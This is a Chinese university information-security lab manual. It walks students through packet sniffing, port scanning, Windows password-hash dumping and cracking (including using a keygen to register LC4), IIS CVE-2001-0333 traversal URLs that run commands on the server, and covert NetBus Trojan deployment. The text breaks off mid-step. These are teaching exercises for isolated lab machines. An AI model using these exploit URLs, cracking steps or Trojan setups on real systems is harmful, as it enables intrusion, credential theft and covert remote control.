1、 信息安全技术实验指导手册20102011学年第二学期课程名称信息安全技术实验 授课班级软件专科(1)(2)班教 师 姓 名 骆 耀 祖 职称 高 级 工 程 师 系部 信 息 工 程 系 广东商学院华商学院教务处前 言伴随着计算机、通信和网络技术的飞速发展,网络安全问题亦愈演愈烈。政府、银行、企事业单位纷纷将安全问题提到重要日程,密切关注。越来越多的学者、专家和企业投身安全协议、安全技术、安全政策等研究开发行列,众多院校相继开设安全专业或将安全课程作为核心课程,以期进一步促进安全技术的发展,安全意识的培养,呼吁全民参与安全,共同构建安全的网络环境。通过学习读者应对网络安全问题的产生和现状有所
2、认识,网络底层协议在安全方面的先天性不足,是攻击频频不断发生的主要原因之一。因此本实验手册第一部分实验内容主要是分析网络通信和网络基础协议的原理和实现过程,为后续实验做准备。知己知彼,百战不殆,实验手册第二部分实验内容主要是针对计算机网络存在的主要威胁和漏洞而开设的,以帮助读者了解攻击原理和漏洞对计算机网络的严重威胁。居安思危,做好计算机网络安全预防工作,对于保证安全有着十分重大的意义,实验手册的第三部分实验内容主要讲述的是计算机网络安全预防保障技术。为有效的利用实验设备,让学生参与实验全过程,本实验手册的部分实验由虚拟机配合完成。实验中所采用的软件版本不是最新版,并且每个实验均还有很多的后续
3、实验内容,希望同学们能够在现有实验的基础上进一步深入学习。目 录第一部分 网络安全基础实验5实验一 网络通信分析6一、实验目的6二、实验环境6三、实验任务7四、实验原理及步骤7五实验报告内容要求14实验二 端口扫描实验15一、实验目的17二、实验设备和环境17三、实验任务17四、实验步骤17五、实验报告内容要求21第二部分 漏洞和威胁22实验三 密码破解23一、实验目的23二、实验环境23三、实验任务24四、实验原理及步骤24五、实验报告内容要求31实验四 Web漏洞攻击32一、实验目的32二、实验环境32三、实验任务32四、实验步骤33五、实验报告内容要求35实验五 特洛伊木马攻击36一、实
4、验目的36二、实验环境37三、实验任务37四、实验步骤37五、实验报告内容要求40六、附件40第三部分 网络安全基础实验44实验六 在Windows中使用证书和SSL45一、实验目的46二、实验环境46三、实验步骤46四、实验报告内容要求55实验七 防火墙部署配置自主设计实验56一、实验目的56二、实验设备和环境57三、实验任务57四、实验步骤57五、实验报告内容要求59实验八 IDS入侵检测系统(snort)61一、实验目的61二、实验设备和环境61三、实验任务62四、实验步骤62五、实验报告内容要求67实验九 端口镜像实验68一、实验目的69二、实验设备和环境69三、实验任务69四、交换机
5、配置示例70五、实验报告内容要求70第一部分 网络安全基础实验保护计算机网络的安全是件棘手的事情,有很多的问题要考虑,因此必须了解已知的弱点、可能的威胁以及检测攻击的方法,并制定相应的方案来处理可能的威胁。然而在能真正保护网络免遭攻击之前,必须首先了解网络,并且应该比攻击者更了解自己的网络。我们必须研究并了解自己的能力和限制、网络的主要应用以及是怎么样实现的。只有这样才能真正地看到弱点并采取必要的措施来保护。这一部分的实验主要是利用网络分析工具和扫描工具,来了解网络通信的原理和过程,以及网络基础协议的实现过程,在实验中我们应将课堂上学到的理论知识充分的利用起来,特别是协议数据包的结构类型。实验
6、一 网络通信分析(90分钟)Ethereal 是一个强大的协议分析器和数据包嗅探软件。Ethereal具有设计完美的GUI 界面和众多分类信息及过滤选项。使用Ethereal可以很方便地对截获的数据包进行分析,包括该数据包的源地址、目的地址、所属协议等,以帮助网络人士分析网络流量和检修网络故障,但Ethereal同时也被心怀叵测的人利用来嗅探网络中传输的帐号、密码等有价值的信息。因此,熟悉Ethereal的工作原理和运行方式,能够帮助网络、安全人员有效的抵御黑客的攻击。1、Ethereal功能:网络管理员用以帮助解决网络问题;网络安全工程师用以测试安全问题;开发人员用以调试协议的实现过程;学习
7、人员用以深入的学习网络协议。2、Ethereal特性:支持Unix 、Linux和 Windows平台;从网络接口上捕获实时数据包;以非常详细的协议方式显示数据包;可以打开或者存贮捕获的数据包;导入/导出数据包,到其它的捕获程序;按多种方式过滤数据包;按多种方式查找数据包;根据过滤条件,以不同的颜色显示数据包;可以建立多种统计数据;3、下载地址:http:/ 1. 熟悉Ethereal工具界面;2. 掌握Ethereal的操作方式;3. 掌握Ethereal的各操作选项;4. 掌握用Ethereal分析协议过程。二、实验环境1. Windows XP Professional2. Window
8、s 2000 Advanced Server3. ethereal-setup-0.99.0.exe三、实验任务1. 安装Ethereal;2. 清除ARP缓存;3. 启动并认识Ethereal;4. 用Ethereal捕获各种协议会话;5. 检查并分析捕获的会话;6. 按条件过滤捕获的会话。四、实验原理及步骤(一)在XP系统上安装Ethereal 1. 双击ethereal-setup-0.99.0.exe; 2. 安装许可; 3. 选择组件,默认即可。 4附加选项,默认即可。5. 安装路径的选择 6. 安装WinPcap,Ethereal可透过WinPcap来劫取网络上的数据包。 7. 点
9、击Install,直至安装完成。(二)在Windows XP上清除ARP缓存 ARP缓存是一个内存区域,计算机在该区域存储着ARP表中所发现的信息。在启动捕获会话之前清除ARP缓冲可以更好地控制所捕获的数据。 1. 在“开始” 、“运行”里输入CMD进入DOS命令行。2. 在命令行上,键入arp a并回车查看。3. 如果出现任何条目,用arp d清除。(三)启动并认识Ethereal1. 从桌面或开始|程序|Ethereal处启动Ethereal,打开Ethereal主界面。如图11所示。图1-1 Ethereal主界面2在图1-1中选择Capture(捕获)菜单,打开捕获选项对话框,如图12
10、所示。 图12 捕获菜单3在打开的捕获选项窗口中(如图13):Interface字段用于指定在哪个接口捕获数据。IP地址字段,用于显示所选接口的IP地址。Capture packets in promiscuous mode (在混杂模式捕获包),一般选中该字段,该选项将设置网卡的接收模式为混杂模式。Capture Filter(捕获过滤)字段,用于设定捕获过滤条件,默认为空。图1-3 捕获选项窗口4选定之后直接单击上图中的Start按钮,开始进行捕获,如图1-4所示。图1-4 开始从接口处捕获数据 5. 适当的时候单击上图中的Stop按钮,停止数据捕获,并出现捕获结果界面,如图1-5所示。
11、Ethereal主界面主要主要分成三部分,从这里大家可以详细的检查被捕获数据包。 数据包列表部分-这部分展示了捕获的数据保概要。单击这部分的任一数据包就可以在另外两个部分中显示更加详细的信息。其中,u NO. -数据包被接收的序号。u TIME-数据保被捕获的时间,相对于捕获的起始时间来计算。u Source-源地址。u Destination-目的地址。u Protocol-用于捕获数据包的协议。u Info-数据包正在做什么的概要。数据包列表部分树型视图部分 数据视图部分 图1-6 在Ethereal中捕获的数据包树型视图部分-这一部分以树型格式展示所选数据包的详细信息。数据视图部分-该部
12、分以十六进制格式显示捕获的数据。6设置过滤条件,进行数据包的过滤。如果网络环境过于复杂,捕获的数据量将会很大。如果从头到尾分析每一个数据包将会很繁琐,因此学习使用Ethereal的过滤功能可以帮助我们接近正在寻找的信息,减轻工作负担。在图16的Filter框中,输入过滤语句,如arp显示结果见图17所示:注意:当在过滤框中输入的时候,如果语法不正确,背景将变成红色,如果正确则为绿色。图1-7 过滤显示(四)用Ethereal捕获FTP、HTTP协议会话。 1. 在Windows 2000 Advanced Server系统中,安装FTP和WEB服务器。 2. 在Windows XP Profe
13、esional中,运行Ethereal并开始捕获数据包。 3. 访问Windows 2000 的FTP,拷贝一个文件。 4. 访问Windows 2000的WEB主页。 5. 停止Ethereal捕获。(五)分析捕获的数据包,简述FTP和HTTP协议的实现过程。五实验报告内容要求1. 简要的实验操作步骤;2. 实验完成情况说明;3. 实验过程中存在的问题;4. 实验心得。实验二 端口扫描实验(45分钟)网络服务或应用程序提供的功能由服务器或主机上的某个或多个进程来实现,端口则相当于进程间的大门,可以随便定义,其目的是为了让两台计算机能够找到对方的进程。“端口”在计算机网络领域是非常重要的概念,
14、它是专门为网络通信而设计的,它是由通信协议TCP/IP定义,其中规定由IP地址和端口作为套接字,它代表TCP连接的一个连接端,一般称为SOCKET,具体来说,就是用IP:端口来定位主机中的进程。可见,端口与进程是一一对应的,如果某个进程正在等待连接,称之为该进程正在监听。在计算机开始-运行里输入cmd进入dos命令行,然后输入netstat-a可以查看本机有哪些进程处于监听状态。根据TCP连接过程(三次握手),入侵者依靠端口扫描可以发现远程计算机上处于监听状态的进程,由此可判断出该计算机提供的服务,端口扫描除了能判断目标计算机上开放了哪些服务外还提供如判断目标计算机上运行的操作系统版本(每种操
15、作系统都开放有不同的端口供系统间通信使用,因此从端口号上也可以大致判断目标主机的操作系统,一般认为开有135、139端口的主机为Windows系统,如果除了135、139外,还开放了5000端口,则该主机为Windows XP操作系统。)等诸多强大的功能。一旦入侵者获得了上述信息,则可以利用系统漏洞或服务漏洞展开对目标的攻击。由上所述,端口扫描是一帮助入侵的工具,但是安全人员同样可以使用端口扫描工具定期检测网络中关键的网络设备和服务器,以查找系统的薄弱点,并尽快修复,因此理解端口扫描原理和熟练使用端口扫描工具对防治入侵有很大的帮助。常见的TCP端口号服务名称端口号说明FTP21文件传输服务Te
16、lnet23远程登陆服务Http80网页浏览服务Pop3110邮件服务Smtp25简单邮件传输服务Socks1080代理服务常见的UDP端口号服务名称端口号说明Rpc111远程调用Snmp161简单网络管理TFTP69简单文件传输常见的端口扫描工具:X-Scan、X-Port、Superscan、PortScanner等。一、实验目的1. 理解端口的概念;2. 了解常用的端口扫描原理;3. 能够熟练的使用常用的端口扫描工具进行弱点检测和修复。二、实验设备和环境1具备基本的局域网环境;2. PC机一台;3. 版本为3.3的X-Scan端口扫描工具。三、实验任务1. 学习或听任课老师介绍关于端口扫
17、描的基础知识;2. 安装X-Scan扫描工具;3. 使用X-Scan进行扫描;4. 记录并分析扫描结果;5. 根据扫描结果采取相应的措施巩固系统。四、实验步骤1. X-Scan是免安装软件,解压后直接双击xscan_gui.exe图标,如图8-1所示;2. 双击xscan_gui.exe图标打开X-Scan主界面,如图8-2所示;3. 认真学习主界面上的使用说明;4选择菜单中的设置选项,打开下拉菜单,选择扫描参数,打开扫描参数对话框,如图8-3所示;在该对话框的左边有三个设置选项检测范围;全局设置;插件设置。使用扫描工具主要是理解扫描参数的作用;5. 检测范围用以确定要扫描的目标或目标范围,现
18、在检测范围内输入IP地址段192.168.4.2-192.168.4.10,如图8-4所示;6. 展开全局设置选项,我们在“扫描模块”中可以定义扫描的主要内容,选择的内容越多,将可能收集到信息越多,但扫描的时间就越长。“并发扫描”中的“最大并发线程数量”切忌不可设置太大,特别是对自己管理的网络设备或服务器扫描的时候,因为设置太大可能会导致扫描对象的异常。对于一般的扫描,我们可以使用XScan的默认设置;图8-1 X-Scan文件内容图8-2 X-Scan主界面 图8-3 X-Scan扫描参数对话框 图8-4 X-Scan扫描范围指定7. “插件设置”中有很多名词术语,如SNMP中的WINS用户
19、列表、NETBIOS等,请自行查找资料了解其涵义;8. 设置完毕后开始扫描,如图8-5所示;9. 认真观察扫描过程,待扫描结束后认真阅读自动生成的扫描报告(生成的检测报告可以是HTML、WORD等格式类型,可以打印,有时可以直接作为安全测试报告)。10. 分析扫描目标存在的问题,并拟定解决措施。 图8-5 检测过程五、实验报告内容要求1. 具体的操作步骤;2. 实验完成情况说明;3. 实验过程中存在的问题;4. 实验心得。第二部分 漏洞和威胁服务器、工作站、交换机、路由器和防火墙等设备对维护网络有着重要的意义。然而,不管支撑网络系统的设备有多么重要,网络的真正价值都不是在这些设备之上,而是在于
20、其数据。在绝大多数情况下,数据比设备更昂贵。网络安全的目标是保护数据,保护数据的特性,即数据的机密性、完整性和有效性,对数据特性的损害就可以认为是个漏洞。威胁是任何可能利用某些漏洞的危害。数据损害可能发生在存储、处理或传输的每一种状态下,并且被攻击的方式各种各样,随着技术的发展,还会有更多意想不到的攻击方式诞生。在这一部分的实验中,我们将看到几种常见的攻击模式,虽然其中的某些攻击方式可能已经再行不通,但了解它们的攻击原理和手法,对于我们今后的安全处理将非常有帮助。实验三 密码破解 访问大多数网络都受限于用户帐户和密码的组合。很多攻击者/破坏者进入网络或主机并不是通过直接获取网络或主机的密码,而
21、是钻了系统或软件服务漏洞的空子,因此,一旦他们进入系统,第一件要做的事情就是获取系统的管理权限,即获取用户名和密码,特别是管理员权限的帐号和密码。得到密码最直接的办法就是破解它。Microsoft Windows系列操作系统的用户名密码都存储在系统文件中,但是密码不是以明文形式存在,而是通过单向散列函数进行了转换处理密码哈希。要破解密码的第一步就是要取得系统中的密码哈希。第二步是破解。由于单向散列函数是不可逆的,所以无法直接通过哈希逆转得到密码。但是破解程序可以采用同样的方式加密字符串得到哈希值,如果破解程序加密某个字符串得到的哈希值与取得的哈希值相等,那么就能判定这个字符串就是系统密码。破解
22、方法一般有三种:一是字典攻击,二是混合攻击,三是暴力攻击。 字典攻击所用的字典文件包含一套通常用作密码的单词,处于字典文件内的密码可以几秒钟被破解。 混合攻击是使用其他的技术与字典攻击相结合的攻击方法。这种类型的攻击可能试图组合字典中的单词,以获得由两个或更多字典单词所组成的密码。暴力攻击是密码破解的另一种方式,其将会顺序尝试可用字符的每个可能的组合。暴力攻击可以占用几天甚或几个月,破解时间的长短取决于密码的强度以及计算机进行破解的处理能力。攻击者可以通过使用分布式的密码破解程序加速破解过程。本实验将要用不同类型的密码创建用户账户。然后用pwdump3来获取密码的哈希,并用LC4破解程序尝试破
23、解。一、实验目的1. 创建有着不同强度密码的新用户账户;2. 掌握破解密码的必要步骤;3. 掌握如何获取密码哈希;4. 掌握如何执行密码破解过程;5. 理解密码强度对于保障系统/网络安全的重要性。二、实验环境1、 Windows XP Professional(与2000系统机器能相互访问) 要求安装有用以获取密码哈希的软件pwdump3和用以破解哈希的软件LC4。2、 Windows 2000 Advanced Server(IP:192.168.174.128)3、 完成此实验必须先获取管理员账号和密码。三、实验任务1. 在Windows 2000上创建不同密码的账户。2. 在Window
24、s XP上运行pwdump3。3. 使用pwdump3获取Windows 2000密码哈希。4. 在Windows XP上运行LC4进行密码的破解。四、实验原理及步骤(一)在Windows 2000上创建不同密码的账户用户名 密码用户名 密码User1 123User4 123happyUser2 happyUser5 bighappyUser3 bigUser6 hello!#(二)在Windows XP Professional运行pwdump31. 解压pwdump3到C盘;2. 在dos下运行pwdump3;3. 首先在dos下定位到pwdump3文件所在的位置;4. 输入pwdump
25、3,回车,如图4-1所示;观察pwdump3的用法;图3-1 运行并使用pwdump35. 键入pwdump3 192.168.174.128 pass.txt administrator,回车,如图4-2所示。上述命令中192.168.174.128为目标机器的IP地址,文件pass.txt用以存储获取的密码哈希。Administrator是目标机器上具备管理权限的账户。图4-2 命令的使用图3-2 命令的使用6接下来在提示符下输入密码(这要求事先知道目标机器上的一个具有管理员权限的账户和密码,也许读者会觉得这样一来此次密码的破解已经毫无意义。但是很多时候攻击者是通过系统或软件的漏洞进入系统
26、的,进入系统后他们先创建一个管理员账户,然后通过该账户获取系统原有账户,因为新建账户很容易被系统管理员察觉。)7. 输入密码后,将会得到Completed提示,如图4-3所示。 图 3-3 命令完成提示8. 在图4-3中键入pass.txt并回车,可以看到获取的用户账户以及密码哈希。(三)安装并注册LC41. 解压LC4.rar,并安装LC4。2. 将解压出的klc4.exe拷贝至LC4的安装路径下。3. 双击klc4.exe开始注册LC4,如图4-4所示。4在图4-4中直接点击关闭,将出现图4-5所示窗口。5在图4-5窗口中点击Rigester,将出现图4-6所示窗口。6直接点击OK,将出现
27、图4-7所示窗口。在该窗口中注册码一栏中,K字母前面的字符串即是注册码。7将注册码拷贝至图4-6注册界面的解码(unlock code)一栏中,即可完成最后注册。图3-4 开始运行注册机图3-5 注册开始界面图3-6 注册界面 图3-7 注册码(四)配置LC4并破解密码哈希。1. 在开始-所有程序中运行LC4,将出现LC4配置向导,如图4-8所示。图3-8 注册向导2. 在图4-8中单击下一步,将出现图4-9所示界面(获取哈希密码)。该界图3-9 获取密码哈希面中有几个选项,我们选择第二个选项(Retrieve from remote machine,从远程机器获取)。3. 在图4-9中单击下
28、一步,将出现图4-10所示界面(选择破解模式)。在该界面中,Quick Password Auditing选项表示快速密码破解;Common Password Auditing普通密码破解;Strong Password Auditing复杂密码破解;Custom表示自定义破解方式。我们选择复杂密码破解。 图3-10 选择审核方式4. 在图4-10中单击下一步,将出现图4-11所示界面(选择报告格式)。在该界面中,几个选项分别是显示已破解的密码;显示加密的密码散列;显示破解密码所用的时间;显示破解模式;完成后创建可视提示。我们将所有选项均选中。5. 下一步,完成LC4的配置。将出现图4-11所
29、示界面。点击小窗口中的cancel按钮,进入LC4界面。6按图4-12所示界面,选择Inport From PWDUMP File选项,导入前面我们用PWDUMP3获取的哈希文件pass.txt。7按图4-13所示界面,选择Begin Audit选项,开始破解。 8自行观察密码破解过程。从破解时间可以看出强弱密码的区别。图3-11 LC4主界面图3-12 导入哈希文件 图3-13 开始破解五、实验报告内容要求1简要的实验操作步骤;2实验完成情况说明;3实验过程存在着的问题;4实验心得。实验四 Web漏洞攻击(60分钟)Microsoft Internet Information Server(
30、IIS)是个流行的web服务器,默认在所有Windows服务器上安装和配置。自从IIS最初发布以来,已经发现了许多漏洞。一旦攻击者发现一台Windows 2000 服务器端口80打开了,就能试图利用这些众所周知的漏洞。即使在一台供公共访问的web服务器,也需要关注其所包含的信息的机密性。也就是说,需要确保有权限的人才能访问数据。Web用户需要能够遍历目录并看到计算机上web根目录之外的东西吗?Web服务器的完整性也是备受关注的。我们需要确保数据的正确性和不被未授权的形式修改。用户不应该能够修改web页面,创建文件夹,在web服务器的文件系统中追加文件等。本实验将利用Microsoft Web服
31、务器,攻击在CVE-2001-0333中阐明的漏洞(CVE组织是为了寻求国际间安全企业、组织、机构对CVE研究成果进行统一命名与解释而形成的一个网络安全漏洞发布组织,由于实际上所起到的巨大的沟通与规范作用,在国际安全界享有绝对的权威性。CVE-2001-0333:Microsoft IIS CGI文件名错误解码漏洞)。这是一个在IIS5.0和之前版本中的目录遍历漏洞,允许远程攻击者通过两次输入“.”和“”字符来执行任意命令。我们将会用此方法来导航并破坏机密性,并创建新的文件夹和应用程序,从而攻击服务器的完整性。一、实验目的1. 了解漏洞的概念;2. 了解ISS Web服务器漏洞攻击的一般手法;
32、3. 理解及时更新漏洞补丁以防止危害的重要性。二、实验环境1. Windows XP Professional2. Windows 2000 Advanced Server(192.168.174.128)3. Windows 2000 Advanced Server 安装CD或ISO4. XP和2000能相互访问三、实验任务1. 在Windows 2000 Advanced Server上安装IIS 5.0;2. 从Windows XP Professional机器上用攻击方法查看目标机器上目录的内容;3. 用攻击方法修改目标机器。四、实验步骤(一)在Windows 2000 Advance
33、d Server上安装IIS 5.0安装IIS的主要目的是为了配置Web服务器。(二)登陆Windows 2000 服务器默认的Web页面在windows XP上:1. 在XP浏览器的地址栏中输入http:/192.168.174.128/,回车,如图4-1。现在应该看到Windows 2000服务器的默认Web页面,它将提示正在建设之中。Web服务器上大多数文件是只读的文本文件。我们在Web服务器上可能会想要一些额外的功能性,因此将会有一些能够执行的文件。IIS服务器上那些文件位于scripts目录中。现在将要试着访问Web服务器上的scripts目录。2. 在地址栏中输入http:/192
34、.168.174.128/scripts/并回车。 观察Web服务器的相应页面? 图4-1 默认的Web页面(三)用攻击方法查看目标机器上目录的内容在windows XP机器上:IIS CVE-2001-0333漏洞允许通过在URL中两次输入“.”和“”字符,能够执行任意的命令。如果机器是易受这个远程方法攻击的,那么利用一个精心准备的URL,将看到默认目录的内容。1.在XP浏览器地址栏中,键入http:/192.168.174.128/scripts/.%255c./ winnt/system32/cmd.exe?/cdir ,回车。注意,必须精确地输入上述URL,输入之后,应该在web浏览器
35、中看到目录C:inetpubscripts中的内容。在以上的URL中,http:/192.168.174.128/指的是目标机器。scripts/是命令将会从那里运行的目录。.%255c.常常被Web服务器所忽略,但其能遍历到Web根目录之外的Unicode。/winnt/system32/cmd.exe?是正被调用的命令。/cdir是附加到该命令的选项。现在已经发现该机器能被利用,下面来看看是否能查看其他目录的内容。2.在XP浏览器地址栏中,键入:http:/192.168.174.128/scripts/.%255c./winnt/system32/cmd.exe?/cdir/winnt,
36、回车。返回的Web页面如图42所示,该页面返回的是系统目录。图4-2 在IIS服务器上遍历目录3.在XP浏览器地址栏中,键入:http:/192.168.174.128/scripts/.%255c./winnt/system32/cmd.exe?/cdir,回车。看到什么页面?(四)用攻击方法修改Web服务器通过上个步骤已经看到了服务器上的文件,下面尝试着用漏洞攻击方法来修改服务器,在远程机器上创建一个目录。1.在XP浏览器地址栏中,键入:http:/192.168.174.128/scripts/.%255c./winnt/system32/cmd.exe?/cmkdirwlab,回车。这
37、会产生一个预期中的错误,因为命令mkdir正确运行时不返回任何信息。2. 单击涮新,这样将会得到目录已经存在的消息。现在再次查看系统目录。3.在XP浏览器地址栏中,键入:http:/192.168.174.128/scripts/.%255c./winnt/system32/cmd.exe?/cdir,回车。观察与(三)中的3步骤中看到的结果有什么不同?结下来咱们将要复制服务器上的文件cmd到这个新位置。4.在XP浏览器地址栏中,键入:http:/192.168.174.128/scripts/.%255c./winnt/system32/cmd.exe?/ccopywinntsystem32
38、cmd.exewlab,回车。该URL返回什么?复制成功了吗?这意味着现在在wlab目录中有了cmd.exe,并且现在能将它用于对该机器的攻击中。5.在XP浏览器地址栏中,键入:http:/192.168.174.128/scripts/.%255c./wlab/cmd.exe?/cdirwlab,回车。注意理解这个URL与前面所使用的URL的区别?尝试着用wlab中的cmd.exe来实现文件的删除?五、实验报告内容要求1. 简要的实验操作过程;2. 实验完成情况说明;3. 实验过程中存在的问题;4. 实验结论。实验五 特洛伊木马攻击(60分钟)随着网络安全技术的发展,网络直接攻击的困难程度越
39、来越大,因此更多的攻击者乐意采用特洛伊木马作为基本的攻击方式。特洛伊木马,又名“Trojan horse”,其名称取自希腊神话的特洛伊木马记。它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。木马的结构: (1)硬件部分:建立木马连接所必须的硬件实体。 控制端:对服务端进行远程控制的一方。 服务端:被控制端远程控制的一方。 INTERNET:控制端对服务端进行远程控制,数据传输的网络载体。 (2)软件部分:实现远程控制所必须的软件程序。 控制端程序:控制端用以远程控制服务端的程序。 木马程序:潜入服务端内部,获取其操作权限的程序。 木马配置程序:设置木马程序的端口号,触发条件,木马名
40、称等,使其在服务端藏得更隐蔽的程序。 (3)具体连接部分:通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。 控制端IP,服务端IP:即控制端,服务端的网络地址,也是木马进行数据传输的目的地。 控制端端口,木马端口:即控制端,服务端的数据入口,通过这个入口,数据可直达控制端程序或木马程序。木马入侵的原理:一.配置木马 这一阶段主要是完成两方面的工作伪装木马,采用的手段很多,如修改图标、捆绑文件、定制端口等;设置信息反馈方式,如使用邮件或QQ反馈。二.传播木马 木马的传播方式很多,但主要通过邮件附件和软件下载进行传播。三.运行木马 木马自动安装和运行,详细内容请参考附件。四.
41、信息泄露: 木马收集信息并通过设置的反馈方式将收集到的信息发回客户端。五.建立连接: 木马的服务端和客户端建立连接。六.远程控制: 客户端通过木马的服务端程序远程控制受害机。一、实验目的完成本实验,应能够:1了解特洛伊的基本组成、基本功能以及操作方式。2了解特洛伊的破坏能力。3根据对特洛伊的了解提出防御方法。二、实验环境1. Windows XP Professional(与2000系统机器能相互访问); 2. Windows 2000 Advanced Server(IP:192.168.174.128);3. 实验软件,nbpro210.exe。三、实验任务1.学习木马的基本知识;2.掌握
42、木马的安装与配置;3.学习如何利用木马来远程控制计算机;4.通过实验对木马攻击原理的了解,制定木马的防范措施。四、实验步骤(一)安装NETBUS在windows xp上:1. 双击NB20pro.exe开始安装NETBUS,安装时全部使用默认设置,直至安装完毕。(二)部署NETBUS并启动服务器在windows xp上:1. 打开netbus的安装目录,复制NBSvr.exe;2. 单击开始-运行,在运行里键入192.168.174.128c$,回车登陆到Windows 2000系统;3. 右键复制NBSvr.exe到C盘;以上步骤实现的是木马的传播,实验中我们采取的是最简单的直接访问的形式,
43、在现实当中,这种方式很难凑效,前面我们提到过木马的常见传播方式是邮件附件和软件捆绑下载;4. 复制后,双击打开,第一次运行时将弹出NetBus对话框,如图5-1所示。 图5-1 NetBus对话框 图5-2 设置对话框5. 单击settings,弹出如图5-2所示对话框; 勾选Accept connection; 在Visibility of server下拉菜单中选择 Only in tasklist; 在Access mode下拉菜单中选择Full access; 勾选Autostart every Windows session; 单击OK。(三)运行客户端并控制目标Netbus提供了搜索网络,查找任何正在运行的netbus服务器的能力。在windows XP上:1. 单击开始-程序-Netbus Pro-Netbus,打开木马客户端程序;2. 在Netbus菜单条上,单击Host-Find,如图5-3所示;3. 在弹出的对话框中键入搜索IP范围,键入192.168.174.128 -192.168. 174.200如图5-4所示,点击start;4. 扫